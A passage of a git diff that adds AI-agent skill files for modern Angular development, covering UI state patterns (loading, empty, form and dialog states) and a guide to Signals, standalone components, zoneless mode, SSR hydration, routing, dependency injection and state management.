|
||||
retry = output<void>();
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Button State Patterns
|
||||
|
||||
### Button Loading State
|
||||
|
||||
```html
|
||||
<button
|
||||
(click)="handleSubmit()"
|
||||
[disabled]="isSubmitting() || !form.valid"
|
||||
class="btn-primary"
|
||||
>
|
||||
@if (isSubmitting()) {
|
||||
<app-spinner size="small" class="mr-2" />
|
||||
Saving... } @else { Save Changes }
|
||||
</button>
|
||||
```
|
||||
|
||||
### Disable During Operations
|
||||
|
||||
**CRITICAL: Always disable triggers during async operations.**
|
||||
|
||||
```typescript
|
||||
// CORRECT - Button disabled while loading
|
||||
@Component({
|
||||
template: `
|
||||
<button
|
||||
[disabled]="saving()"
|
||||
(click)="save()"
|
||||
>
|
||||
@if (saving()) {
|
||||
<app-spinner size="sm" /> Saving...
|
||||
} @else {
|
||||
Save
|
||||
}
|
||||
</button>
|
||||
`
|
||||
})
|
||||
export class SaveButtonComponent {
|
||||
saving = signal(false);
|
||||
|
||||
async save() {
|
||||
this.saving.set(true);
|
||||
try {
|
||||
await this.service.save();
|
||||
} finally {
|
||||
this.saving.set(false);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// WRONG - User can click multiple times
|
||||
<button (click)="save()">
|
||||
{{ saving() ? 'Saving...' : 'Save' }}
|
||||
</button>
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Empty States
|
||||
|
||||
### Empty State Requirements
|
||||
|
||||
Every list/collection MUST have an empty state:
|
||||
|
||||
```html
|
||||
@for (item of items(); track item.id) {
|
||||
<app-item-card [item]="item" />
|
||||
} @empty {
|
||||
<app-empty-state
|
||||
icon="folder-open"
|
||||
title="No items yet"
|
||||
description="Create your first item to get started"
|
||||
actionLabel="Create Item"
|
||||
(action)="openCreateDialog()"
|
||||
/>
|
||||
}
|
||||
```
|
||||
|
||||
### Contextual Empty States
|
||||
|
||||
```typescript
|
||||
@Component({
|
||||
selector: "app-empty-state",
|
||||
template: `
|
||||
<div class="empty-state">
|
||||
<span class="icon" [class]="icon()"></span>
|
||||
<h3>{{ title() }}</h3>
|
||||
<p>{{ description() }}</p>
|
||||
@if (actionLabel()) {
|
||||
<button (click)="action.emit()" class="btn-primary">
|
||||
{{ actionLabel() }}
|
||||
</button>
|
||||
}
|
||||
</div>
|
||||
`,
|
||||
})
|
||||
export class EmptyStateComponent {
|
||||
icon = input("inbox");
|
||||
title = input.required<string>();
|
||||
description = input("");
|
||||
actionLabel = input<string | null>(null);
|
||||
action = output<void>();
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Form Patterns
|
||||
|
||||
### Form with Loading and Validation
|
||||
|
||||
```typescript
|
||||
@Component({
|
||||
template: `
|
||||
<form [formGroup]="form" (ngSubmit)="onSubmit()">
|
||||
<div class="form-field">
|
||||
<label for="name">Name</label>
|
||||
<input
|
||||
id="name"
|
||||
formControlName="name"
|
||||
[class.error]="isFieldInvalid('name')"
|
||||
/>
|
||||
@if (isFieldInvalid("name")) {
|
||||
<span class="error-text">
|
||||
{{ getFieldError("name") }}
|
||||
</span>
|
||||
}
|
||||
</div>
|
||||
|
||||
<div class="form-field">
|
||||
<label for="email">Email</label>
|
||||
<input id="email" type="email" formControlName="email" />
|
||||
@if (isFieldInvalid("email")) {
|
||||
<span class="error-text">
|
||||
{{ getFieldError("email") }}
|
||||
</span>
|
||||
}
|
||||
</div>
|
||||
|
||||
<button type="submit" [disabled]="form.invalid || submitting()">
|
||||
@if (submitting()) {
|
||||
<app-spinner size="sm" /> Submitting...
|
||||
} @else {
|
||||
Submit
|
||||
}
|
||||
</button>
|
||||
</form>
|
||||
`,
|
||||
})
|
||||
export class UserFormComponent {
|
||||
private fb = inject(FormBuilder);
|
||||
|
||||
submitting = signal(false);
|
||||
|
||||
form = this.fb.group({
|
||||
name: ["", [Validators.required, Validators.minLength(2)]],
|
||||
email: ["", [Validators.required, Validators.email]],
|
||||
});
|
||||
|
||||
isFieldInvalid(field: string): boolean {
|
||||
const control = this.form.get(field);
|
||||
return control ? control.invalid && control.touched : false;
|
||||
}
|
||||
|
||||
getFieldError(field: string): string {
|
||||
const control = this.form.get(field);
|
||||
if (control?.hasError("required")) return "This field is required";
|
||||
if (control?.hasError("email")) return "Invalid email format";
|
||||
if (control?.hasError("minlength")) return "Too short";
|
||||
return "";
|
||||
}
|
||||
|
||||
async onSubmit() {
|
||||
if (this.form.invalid) return;
|
||||
|
||||
this.submitting.set(true);
|
||||
try {
|
||||
await this.service.submit(this.form.value);
|
||||
this.toast.success("Submitted successfully");
|
||||
} catch {
|
||||
this.toast.error("Submission failed");
|
||||
} finally {
|
||||
this.submitting.set(false);
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Dialog/Modal Patterns
|
||||
|
||||
### Confirmation Dialog
|
||||
|
||||
```typescript
|
||||
// dialog.service.ts
|
||||
@Injectable({ providedIn: 'root' })
|
||||
export class DialogService {
|
||||
private dialog = inject(Dialog); // CDK Dialog or custom
|
||||
|
||||
async confirm(options: {
|
||||
title: string;
|
||||
message: string;
|
||||
confirmText?: string;
|
||||
cancelText?: string;
|
||||
}): Promise<boolean> {
|
||||
const dialogRef = this.dialog.open(ConfirmDialogComponent, {
|
||||
data: options,
|
||||
});
|
||||
|
||||
return await firstValueFrom(dialogRef.closed) ?? false;
|
||||
}
|
||||
}
|
||||
|
||||
// Usage
|
||||
async deleteItem(item: Item) {
|
||||
const confirmed = await this.dialog.confirm({
|
||||
title: 'Delete Item',
|
||||
message: `Are you sure you want to delete "${item.name}"?`,
|
||||
confirmText: 'Delete',
|
||||
});
|
||||
|
||||
if (confirmed) {
|
||||
await this.store.delete(item.id);
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### Loading States
|
||||
|
||||
```typescript
|
||||
// WRONG - Spinner when data exists (causes flash on refetch)
|
||||
@if (loading()) {
|
||||
<app-spinner />
|
||||
}
|
||||
|
||||
// CORRECT - Only show loading without data
|
||||
@if (loading() && !items().length) {
|
||||
<app-spinner />
|
||||
}
|
||||
```
|
||||
|
||||
### Error Handling
|
||||
|
||||
```typescript
|
||||
// WRONG - Error swallowed
|
||||
try {
|
||||
await this.service.save();
|
||||
} catch (e) {
|
||||
console.log(e); // User has no idea!
|
||||
}
|
||||
|
||||
// CORRECT - Error surfaced
|
||||
try {
|
||||
await this.service.save();
|
||||
} catch (e) {
|
||||
console.error("Save failed:", e);
|
||||
this.toast.error("Failed to save. Please try again.");
|
||||
}
|
||||
```
|
||||
|
||||
### Button States
|
||||
|
||||
```html
|
||||
<!-- WRONG - Button not disabled during submission -->
|
||||
<button (click)="submit()">Submit</button>
|
||||
|
||||
<!-- CORRECT - Disabled and shows loading -->
|
||||
<button (click)="submit()" [disabled]="loading()">
|
||||
@if (loading()) {
|
||||
<app-spinner size="sm" />
|
||||
} Submit
|
||||
</button>
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## UI State Checklist
|
||||
|
||||
Before completing any UI component:
|
||||
|
||||
### UI States
|
||||
|
||||
- [ ] Error state handled and shown to user
|
||||
- [ ] Loading state shown only when no data exists
|
||||
- [ ] Empty state provided for collections (`@empty` block)
|
||||
- [ ] Buttons disabled during async operations
|
||||
- [ ] Buttons show loading indicator when appropriate
|
||||
|
||||
### Data & Mutations
|
||||
|
||||
- [ ] All async operations have error handling
|
||||
- [ ] All user actions have feedback (toast/visual)
|
||||
- [ ] Optimistic updates rollback on failure
|
||||
|
||||
### Accessibility
|
||||
|
||||
- [ ] Loading states announced to screen readers
|
||||
- [ ] Error messages linked to form fields
|
||||
- [ ] Focus management after state changes
|
||||
|
||||
---
|
||||
|
||||
## Integration with Other Skills
|
||||
|
||||
- **angular-state-management**: Use Signal stores for state
|
||||
- **angular**: Apply modern patterns (Signals, @defer)
|
||||
- **testing-patterns**: Test all UI states
|
||||
|
||||
## When to Use
|
||||
This skill is applicable to execute the workflow or actions described in the overview.
|
||||
12
packages/llm/skills/angular-ui-patterns/metadata.json
Normal file
12
packages/llm/skills/angular-ui-patterns/metadata.json
Normal file
@ -0,0 +1,12 @@
|
||||
{
|
||||
"version": "1.0.0",
|
||||
"organization": "Antigravity Awesome Skills",
|
||||
"date": "February 2026",
|
||||
"abstract": "Modern UI patterns for Angular applications designed for AI agents and LLMs. Covers loading states, error handling, progressive disclosure, and data display patterns. Emphasizes showing loading only without data, surfacing all errors, optimistic updates, and graceful degradation using @defer. Includes decision trees and anti-patterns to avoid.",
|
||||
"references": [
|
||||
"https://angular.dev/guide/defer",
|
||||
"https://angular.dev/guide/templates",
|
||||
"https://material.angular.io",
|
||||
"https://ng-spartan.com"
|
||||
]
|
||||
}
|
||||
40
packages/llm/skills/angular/README.md
Normal file
40
packages/llm/skills/angular/README.md
Normal file
@ -0,0 +1,40 @@
|
||||
# Angular
|
||||
|
||||
A comprehensive guide to modern Angular development (v20+) optimized for AI agents and LLMs.
|
||||
|
||||
## Overview
|
||||
|
||||
This skill covers modern Angular patterns including:
|
||||
|
||||
- **Signals** - Angular's reactive primitive for state management
|
||||
- **Standalone Components** - Modern component architecture without NgModules
|
||||
- **Zoneless Applications** - High-performance apps without Zone.js
|
||||
- **SSR & Hydration** - Server-side rendering and client hydration patterns
|
||||
- **Modern Routing** - Functional guards, resolvers, and lazy loading
|
||||
- **Dependency Injection** - Modern DI with `inject()` function
|
||||
- **Reactive Forms** - Type-safe form handling
|
||||
|
||||
## Structure
|
||||
|
||||
This skill is a single, comprehensive `SKILL.md` file containing:
|
||||
|
||||
1. Modern component patterns with Signal inputs/outputs
|
||||
2. State management with Signals and computed values
|
||||
3. Performance optimization techniques
|
||||
4. SSR and hydration best practices
|
||||
5. Migration strategies from legacy Angular patterns
|
||||
|
||||
## Usage
|
||||
|
||||
This skill is designed to be read in full to understand the complete modern Angular development approach, or referenced for specific patterns when needed.
|
||||
|
||||
## Version
|
||||
|
||||
Current version: 1.0.0 (February 2026)
|
||||
|
||||
## References
|
||||
|
||||
- [Angular Documentation](https://angular.dev)
|
||||
- [Angular Signals](https://angular.dev/guide/signals)
|
||||
- [Zoneless Angular](https://angular.dev/guide/zoneless)
|
||||
- [Angular SSR](https://angular.dev/guide/ssr)
|
||||
818
packages/llm/skills/angular/SKILL.md
Normal file
818
packages/llm/skills/angular/SKILL.md
Normal file
@ -0,0 +1,818 @@
|
||||
---
|
||||
name: angular
|
||||
description: Modern Angular (v20+) expert with deep knowledge of Signals, Standalone Components, Zoneless applications, SSR/Hydration, and reactive patterns.
|
||||
risk: safe
|
||||
source: self
|
||||
date_added: '2026-02-27'
|
||||
---
|
||||
|
||||
# Angular Expert
|
||||
|
||||
Master modern Angular development with Signals, Standalone Components, Zoneless applications, SSR/Hydration, and the latest reactive patterns.
|
||||
|
||||
## When to Use This Skill
|
||||
|
||||
- Building new Angular applications (v20+)
|
||||
- Implementing Signals-based reactive patterns
|
||||
- Creating Standalone Components and migrating from NgModules
|
||||
- Configuring Zoneless Angular applications
|
||||
- Implementing SSR, prerendering, and hydration
|
||||
- Optimizing Angular performance
|
||||
- Adopting modern Angular patterns and best practices
|
||||
|
||||
## Do Not Use This Skill When
|
||||
|
||||
- Migrating from AngularJS (1.x) → use `angular-migration` skill
|
||||
- Working with legacy Angular apps that cannot upgrade
|
||||
- General TypeScript issues → use `typescript-expert` skill
|
||||
|
||||
## Instructions
|
||||
|
||||
1. Assess the Angular version and project structure
|
||||
2. Apply modern patterns (Signals, Standalone, Zoneless)
|
||||
3. Implement with proper typing and reactivity
|
||||
4. Validate with build and tests
|
||||
|
||||
## Safety
|
||||
|
||||
- Always test changes in development before production
|
||||
- Gradual migration for existing apps (don't big-bang refactor)
|
||||
- Keep backward compatibility during transitions
|
||||
|
||||
---
|
||||
|
||||
## Angular Version Timeline
|
||||
|
||||
| Version | Release | Key Features |
|
||||
| -------------- | ------- | ------------------------------------------------------ |
|
||||
| **Angular 20** | Q2 2025 | Signals stable, Zoneless stable, Incremental hydration |
|
||||
| **Angular 21** | Q4 2025 | Signals-first default, Enhanced SSR |
|
||||
| **Angular 22** | Q2 2026 | Signal Forms, Selectorless components |
|
||||
|
||||
---
|
||||
|
||||
## 1. Signals: The New Reactive Primitive
|
||||
|
||||
Signals are Angular's fine-grained reactivity system, replacing zone.js-based change detection.
|
||||
|
||||
### Core Concepts
|
||||
|
||||
```typescript
|
||||
import { signal, computed, effect } from "@angular/core";
|
||||
|
||||
// Writable signal
|
||||
const count = signal(0);
|
||||
|
||||
// Read value
|
||||
console.log(count()); // 0
|
||||
|
||||
// Update value
|
||||
count.set(5); // Direct set
|
||||
count.update((v) => v + 1); // Functional update
|
||||
|
||||
// Computed (derived) signal
|
||||
const doubled = computed(() => count() * 2);
|
||||
|
||||
// Effect (side effects)
|
||||
effect(() => {
|
||||
console.log(`Count changed to: ${count()}`);
|
||||
});
|
||||
```
|
||||
|
||||
### Signal-Based Inputs and Outputs
|
||||
|
||||
```typescript
|
||||
import { Component, input, output, model } from "@angular/core";
|
||||
|
||||
@Component({
|
||||
selector: "app-user-card",
|
||||
standalone: true,
|
||||
template: `
|
||||
<div class="card">
|
||||
<h3>{{ name() }}</h3>
|
||||
<span>{{ role() }}</span>
|
||||
<button (click)="select.emit(id())">Select</button>
|
||||
</div>
|
||||
`,
|
||||
})
|
||||
export class UserCardComponent {
|
||||
// Signal inputs (read-only)
|
||||
id = input.required<string>();
|
||||
name = input.required<string>();
|
||||
role = input<string>("User"); // With default
|
||||
|
||||
// Output
|
||||
select = output<string>();
|
||||
|
||||
// Two-way binding (model)
|
||||
isSelected = model(false);
|
||||
}
|
||||
|
||||
// Usage:
|
||||
// <app-user-card [id]="'123'" [name]="'John'" [(isSelected)]="selected" />
|
||||
```
|
||||
|
||||
### Signal Queries (ViewChild/ContentChild)
|
||||
|
||||
```typescript
|
||||
import {
|
||||
Component,
|
||||
viewChild,
|
||||
viewChildren,
|
||||
contentChild,
|
||||
} from "@angular/core";
|
||||
|
||||
@Component({
|
||||
selector: "app-container",
|
||||
standalone: true,
|
||||
template: `
|
||||
<input #searchInput />
|
||||
<app-item *ngFor="let item of items()" />
|
||||
`,
|
||||
})
|
||||
export class ContainerComponent {
|
||||
// Signal-based queries
|
||||
searchInput = viewChild<ElementRef>("searchInput");
|
||||
items = viewChildren(ItemComponent);
|
||||
projectedContent = contentChild(HeaderDirective);
|
||||
|
||||
focusSearch() {
|
||||
this.searchInput()?.nativeElement.focus();
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### When to Use Signals vs RxJS
|
||||
|
||||
| Use Case | Signals | RxJS |
|
||||
| ----------------------- | --------------- | -------------------------------- |
|
||||
| Local component state | ✅ Preferred | Overkill |
|
||||
| Derived/computed values | ✅ `computed()` | `combineLatest` works |
|
||||
| Side effects | ✅ `effect()` | `tap` operator |
|
||||
| HTTP requests | ❌ | ✅ HttpClient returns Observable |
|
||||
| Event streams | ❌ | ✅ `fromEvent`, operators |
|
||||
| Complex async flows | ❌ | ✅ `switchMap`, `mergeMap` |
|
||||
|
||||
---
|
||||
|
||||
## 2. Standalone Components
|
||||
|
||||
Standalone components are self-contained and don't require NgModule declarations.
|
||||
|
||||
### Creating Standalone Components
|
||||
|
||||
```typescript
|
||||
import { Component } from "@angular/core";
|
||||
import { CommonModule } from "@angular/common";
|
||||
import { RouterLink } from "@angular/router";
|
||||
|
||||
@Component({
|
||||
selector: "app-header",
|
||||
standalone: true,
|
||||
imports: [CommonModule, RouterLink], // Direct imports
|
||||
template: `
|
||||
<header>
|
||||
<a routerLink="/">Home</a>
|
||||
<a routerLink="/about">About</a>
|
||||
</header>
|
||||
`,
|
||||
})
|
||||
export class HeaderComponent {}
|
||||
```
|
||||
|
||||
### Bootstrapping Without NgModule
|
||||
|
||||
```typescript
|
||||
// main.ts
|
||||
import { bootstrapApplication } from "@angular/platform-browser";
|
||||
import { provideRouter } from "@angular/router";
|
||||
import { provideHttpClient } from "@angular/common/http";
|
||||
import { AppComponent } from "./app/app.component";
|
||||
import { routes } from "./app/app.routes";
|
||||
|
||||
bootstrapApplication(AppComponent, {
|
||||
providers: [provideRouter(routes), provideHttpClient()],
|
||||
});
|
||||
```
|
||||
|
||||
### Lazy Loading Standalone Components
|
||||
|
||||
```typescript
|
||||
// app.routes.ts
|
||||
import { Routes } from "@angular/router";
|
||||
|
||||
export const routes: Routes = [
|
||||
{
|
||||
path: "dashboard",
|
||||
loadComponent: () =>
|
||||
import("./dashboard/dashboard.component").then(
|
||||
(m) => m.DashboardComponent,
|
||||
),
|
||||
},
|
||||
{
|
||||
path: "admin",
|
||||
loadChildren: () =>
|
||||
import("./admin/admin.routes").then((m) => m.ADMIN_ROUTES),
|
||||
},
|
||||
];
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 3. Zoneless Angular
|
||||
|
||||
Zoneless applications don't use zone.js, improving performance and debugging.
|
||||
|
||||
### Enabling Zoneless Mode
|
||||
|
||||
```typescript
|
||||
// main.ts
|
||||
import { bootstrapApplication } from "@angular/platform-browser";
|
||||
import { provideZonelessChangeDetection } from "@angular/core";
|
||||
import { AppComponent } from "./app/app.component";
|
||||
|
||||
bootstrapApplication(AppComponent, {
|
||||
providers: [provideZonelessChangeDetection()],
|
||||
});
|
||||
```
|
||||
|
||||
### Zoneless Component Patterns
|
||||
|
||||
```typescript
|
||||
import { Component, signal, ChangeDetectionStrategy } from "@angular/core";
|
||||
|
||||
@Component({
|
||||
selector: "app-counter",
|
||||
standalone: true,
|
||||
changeDetection: ChangeDetectionStrategy.OnPush,
|
||||
template: `
|
||||
<div>Count: {{ count() }}</div>
|
||||
<button (click)="increment()">+</button>
|
||||
`,
|
||||
})
|
||||
export class CounterComponent {
|
||||
count = signal(0);
|
||||
|
||||
increment() {
|
||||
this.count.update((v) => v + 1);
|
||||
// No zone.js needed - Signal triggers change detection
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### Key Zoneless Benefits
|
||||
|
||||
- **Performance**: No zone.js patches on async APIs
|
||||
- **Debugging**: Clean stack traces without zone wrappers
|
||||
- **Bundle size**: Smaller without zone.js (~15KB savings)
|
||||
- **Interoperability**: Better with Web Components and micro-frontends
|
||||
|
||||
---
|
||||
|
||||
## 4. Server-Side Rendering & Hydration
|
||||
|
||||
### SSR Setup with Angular CLI
|
||||
|
||||
```bash
|
||||
ng add @angular/ssr
|
||||
```
|
||||
|
||||
### Hydration Configuration
|
||||
|
||||
```typescript
|
||||
// app.config.ts
|
||||
import { ApplicationConfig } from "@angular/core";
|
||||
import {
|
||||
provideClientHydration,
|
||||
withEventReplay,
|
||||
} from "@angular/platform-browser";
|
||||
|
||||
export const appConfig: ApplicationConfig = {
|
||||
providers: [provideClientHydration(withEventReplay())],
|
||||
};
|
||||
```
|
||||
|
||||
### Incremental Hydration (v20+)
|
||||
|
||||
```typescript
|
||||
import { Component } from "@angular/core";
|
||||
|
||||
@Component({
|
||||
selector: "app-page",
|
||||
standalone: true,
|
||||
template: `
|
||||
<app-hero />
|
||||
|
||||
@defer (hydrate on viewport) {
|
||||
<app-comments />
|
||||
}
|
||||
|
||||
@defer (hydrate on interaction) {
|
||||
<app-chat-widget />
|
||||
}
|
||||
`,
|
||||
})
|
||||
export class PageComponent {}
|
||||
```
|
||||
|
||||
### Hydration Triggers
|
||||
|
||||
| Trigger | When to Use |
|
||||
| ---------------- | --------------------------------------- |
|
||||
| `on idle` | Low-priority, hydrate when browser idle |
|
||||
| `on viewport` | Hydrate when element enters viewport |
|
||||
| `on interaction` | Hydrate on first user interaction |
|
||||
| `on hover` | Hydrate when user hovers |
|
||||
| `on timer(ms)` | Hydrate after specified delay |
|
||||
|
||||
---
|
||||
|
||||
## 5. Modern Routing Patterns
|
||||
|
||||
### Functional Route Guards
|
||||
|
||||
```typescript
|
||||
// auth.guard.ts
|
||||
import { inject } from "@angular/core";
|
||||
import { Router, CanActivateFn } from "@angular/router";
|
||||
import { AuthService } from "./auth.service";
|
||||
|
||||
export const authGuard: CanActivateFn = (route, state) => {
|
||||
const auth = inject(AuthService);
|
||||
const router = inject(Router);
|
||||
|
||||
if (auth.isAuthenticated()) {
|
||||
return true;
|
||||
}
|
||||
|
||||
return router.createUrlTree(["/login"], {
|
||||
queryParams: { returnUrl: state.url },
|
||||
});
|
||||
};
|
||||
|
||||
// Usage in routes
|
||||
export const routes: Routes = [
|
||||
{
|
||||
path: "dashboard",
|
||||
loadComponent: () => import("./dashboard.component"),
|
||||
canActivate: [authGuard],
|
||||
},
|
||||
];
|
||||
```
|
||||
|
||||
### Route-Level Data Resolvers
|
||||
|
||||
```typescript
|
||||
import { inject } from '@angular/core';
|
||||
import { ResolveFn } from '@angular/router';
|
||||
import { UserService } from './user.service';
|
||||
import { User } from './user.model';
|
||||
|
||||
export const userResolver: ResolveFn<User> = (route) => {
|
||||
const userService = inject(UserService);
|
||||
return userService.getUser(route.paramMap.get('id')!);
|
||||
};
|
||||
|
||||
// In routes
|
||||
{
|
||||
path: 'user/:id',
|
||||
loadComponent: () => import('./user.component'),
|
||||
resolve: { user: userResolver }
|
||||
}
|
||||
|
||||
// In component
|
||||
export class UserComponent {
|
||||
private route = inject(ActivatedRoute);
|
||||
user = toSignal(this.route.data.pipe(map(d => d['user'])));
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 6. Dependency Injection Patterns
|
||||
|
||||
### Modern inject() Function
|
||||
|
||||
```typescript
|
||||
import { Component, inject } from '@angular/core';
|
||||
import { HttpClient } from '@angular/common/http';
|
||||
import { UserService } from './user.service';
|
||||
|
||||
@Component({...})
|
||||
export class UserComponent {
|
||||
// Modern inject() - no constructor needed
|
||||
private http = inject(HttpClient);
|
||||
private userService = inject(UserService);
|
||||
|
||||
// Works in any injection context
|
||||
users = toSignal(this.userService.getUsers());
|
||||
}
|
||||
```
|
||||
|
||||
### Injection Tokens for Configuration
|
||||
|
||||
```typescript
|
||||
import { InjectionToken, inject } from "@angular/core";
|
||||
|
||||
// Define token
|
||||
export const API_BASE_URL = new InjectionToken<string>("API_BASE_URL");
|
||||
|
||||
// Provide in config
|
||||
bootstrapApplication(AppComponent, {
|
||||
providers: [{ provide: API_BASE_URL, useValue: "https://api.example.com" }],
|
||||
});
|
||||
|
||||
// Inject in service
|
||||
@Injectable({ providedIn: "root" })
|
||||
export class ApiService {
|
||||
private baseUrl = inject(API_BASE_URL);
|
||||
|
||||
get(endpoint: string) {
|
||||
return this.http.get(`${this.baseUrl}/${endpoint}`);
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 7. Component Composition & Reusability
|
||||
|
||||
### Content Projection (Slots)
|
||||
|
||||
```typescript
|
||||
@Component({
|
||||
selector: 'app-card',
|
||||
template: `
|
||||
<div class="card">
|
||||
<div class="header">
|
||||
<!-- Select by attribute -->
|
||||
<ng-content select="[card-header]"></ng-content>
|
||||
</div>
|
||||
<div class="body">
|
||||
<!-- Default slot -->
|
||||
<ng-content></ng-content>
|
||||
</div>
|
||||
</div>
|
||||
`
|
||||
})
|
||||
export class CardComponent {}
|
||||
|
||||
// Usage
|
||||
<app-card>
|
||||
<h3 card-header>Title</h3>
|
||||
<p>Body content</p>
|
||||
</app-card>
|
||||
```
|
||||
|
||||
### Host Directives (Composition)
|
||||
|
||||
```typescript
|
||||
// Reusable behaviors without inheritance
|
||||
@Directive({
|
||||
standalone: true,
|
||||
selector: '[appTooltip]',
|
||||
inputs: ['tooltip'] // Signal input alias
|
||||
})
|
||||
export class TooltipDirective { ... }
|
||||
|
||||
@Component({
|
||||
selector: 'app-button',
|
||||
standalone: true,
|
||||
hostDirectives: [
|
||||
{
|
||||
directive: TooltipDirective,
|
||||
inputs: ['tooltip: title'] // Map input
|
||||
}
|
||||
],
|
||||
template: `<ng-content />`
|
||||
})
|
||||
export class ButtonComponent {}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 8. State Management Patterns
|
||||
|
||||
### Signal-Based State Service
|
||||
|
||||
```typescript
|
||||
import { Injectable, signal, computed } from "@angular/core";
|
||||
|
||||
interface AppState {
|
||||
user: User | null;
|
||||
theme: "light" | "dark";
|
||||
notifications: Notification[];
|
||||
}
|
||||
|
||||
@Injectable({ providedIn: "root" })
|
||||
export class StateService {
|
||||
// Private writable signals
|
||||
private _user = signal<User | null>(null);
|
||||
private _theme = signal<"light" | "dark">("light");
|
||||
private _notifications = signal<Notification[]>([]);
|
||||
|
||||
// Public read-only computed
|
||||
readonly user = computed(() => this._user());
|
||||
readonly theme = computed(() => this._theme());
|
||||
readonly notifications = computed(() => this._notifications());
|
||||
readonly unreadCount = computed(
|
||||
() => this._notifications().filter((n) => !n.read).length,
|
||||
);
|
||||
|
||||
// Actions
|
||||
setUser(user: User | null) {
|
||||
this._user.set(user);
|
||||
}
|
||||
|
||||
toggleTheme() {
|
||||
this._theme.update((t) => (t === "light" ? "dark" : "light"));
|
||||
}
|
||||
|
||||
addNotification(notification: Notification) {
|
||||
this._notifications.update((n) => [...n, notification]);
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### Component Store Pattern with Signals
|
||||
|
||||
```typescript
|
||||
import { Injectable, signal, computed, inject } from "@angular/core";
|
||||
import { HttpClient } from "@angular/common/http";
|
||||
import { toSignal } from "@angular/core/rxjs-interop";
|
||||
|
||||
@Injectable()
|
||||
export class ProductStore {
|
||||
private http = inject(HttpClient);
|
||||
|
||||
// State
|
||||
private _products = signal<Product[]>([]);
|
||||
private _loading = signal(false);
|
||||
private _filter = signal("");
|
||||
|
||||
// Selectors
|
||||
readonly products = computed(() => this._products());
|
||||
readonly loading = computed(() => this._loading());
|
||||
readonly filteredProducts = computed(() => {
|
||||
const filter = this._filter().toLowerCase();
|
||||
return this._products().filter((p) =>
|
||||
p.name.toLowerCase().includes(filter),
|
||||
);
|
||||
});
|
||||
|
||||
// Actions
|
||||
loadProducts() {
|
||||
this._loading.set(true);
|
||||
this.http.get<Product[]>("/api/products").subscribe({
|
||||
next: (products) => {
|
||||
this._products.set(products);
|
||||
this._loading.set(false);
|
||||
},
|
||||
error: () => this._loading.set(false),
|
||||
});
|
||||
}
|
||||
|
||||
setFilter(filter: string) {
|
||||
this._filter.set(filter);
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 9. Forms with Signals (Coming in v22+)
|
||||
|
||||
### Current Reactive Forms
|
||||
|
||||
```typescript
|
||||
import { Component, inject } from "@angular/core";
|
||||
import { FormBuilder, Validators, ReactiveFormsModule } from "@angular/forms";
|
||||
|
||||
@Component({
|
||||
selector: "app-user-form",
|
||||
standalone: true,
|
||||
imports: [ReactiveFormsModule],
|
||||
template: `
|
||||
<form [formGroup]="form" (ngSubmit)="onSubmit()">
|
||||
<input formControlName="name" placeholder="Name" />
|
||||
<input formControlName="email" type="email" placeholder="Email" />
|
||||
<button [disabled]="form.invalid">Submit</button>
|
||||
</form>
|
||||
`,
|
||||
})
|
||||
export class UserFormComponent {
|
||||
private fb = inject(FormBuilder);
|
||||
|
||||
form = this.fb.group({
|
||||
name: ["", Validators.required],
|
||||
email: ["", [Validators.required, Validators.email]],
|
||||
});
|
||||
|
||||
onSubmit() {
|
||||
if (this.form.valid) {
|
||||
console.log(this.form.value);
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### Signal-Aware Form Patterns (Preview)
|
||||
|
||||
```typescript
|
||||
// Future Signal Forms API (experimental)
|
||||
import { Component, signal } from '@angular/core';
|
||||
|
||||
@Component({...})
|
||||
export class SignalFormComponent {
|
||||
name = signal('');
|
||||
email = signal('');
|
||||
|
||||
// Computed validation
|
||||
isValid = computed(() =>
|
||||
this.name().length > 0 &&
|
||||
this.email().includes('@')
|
||||
);
|
||||
|
||||
submit() {
|
||||
if (this.isValid()) {
|
||||
console.log({ name: this.name(), email: this.email() });
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 10. Performance Optimization
|
||||
|
||||
### Change Detection Strategies
|
||||
|
||||
```typescript
|
||||
@Component({
|
||||
changeDetection: ChangeDetectionStrategy.OnPush,
|
||||
// Only checks when:
|
||||
// 1. Input signal/reference changes
|
||||
// 2. Event handler runs
|
||||
// 3. Async pipe emits
|
||||
// 4. Signal value changes
|
||||
})
|
||||
```
|
||||
|
||||
### Defer Blocks for Lazy Loading
|
||||
|
||||
```typescript
|
||||
@Component({
|
||||
template: `
|
||||
<!-- Immediate loading -->
|
||||
<app-header />
|
||||
|
||||
<!-- Lazy load when visible -->
|
||||
@defer (on viewport) {
|
||||
<app-heavy-chart />
|
||||
} @placeholder {
|
||||
<div class="skeleton" />
|
||||
} @loading (minimum 200ms) {
|
||||
<app-spinner />
|
||||
} @error {
|
||||
<p>Failed to load chart</p>
|
||||
}
|
||||
`
|
||||
})
|
||||
```
|
||||
|
||||
### NgOptimizedImage
|
||||
|
||||
```typescript
|
||||
import { NgOptimizedImage } from '@angular/common';
|
||||
|
||||
@Component({
|
||||
imports: [NgOptimizedImage],
|
||||
template: `
|
||||
<img
|
||||
ngSrc="hero.jpg"
|
||||
width="800"
|
||||
height="600"
|
||||
priority
|
||||
/>
|
||||
|
||||
<img
|
||||
ngSrc="thumbnail.jpg"
|
||||
width="200"
|
||||
height="150"
|
||||
loading="lazy"
|
||||
placeholder="blur"
|
||||
/>
|
||||
`
|
||||
})
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## 11. Testing Modern Angular
|
||||
|
||||
### Testing Signal Components
|
||||
|
||||
```typescript
|
||||
import { ComponentFixture, TestBed } from "@angular/core/testing";
|
||||
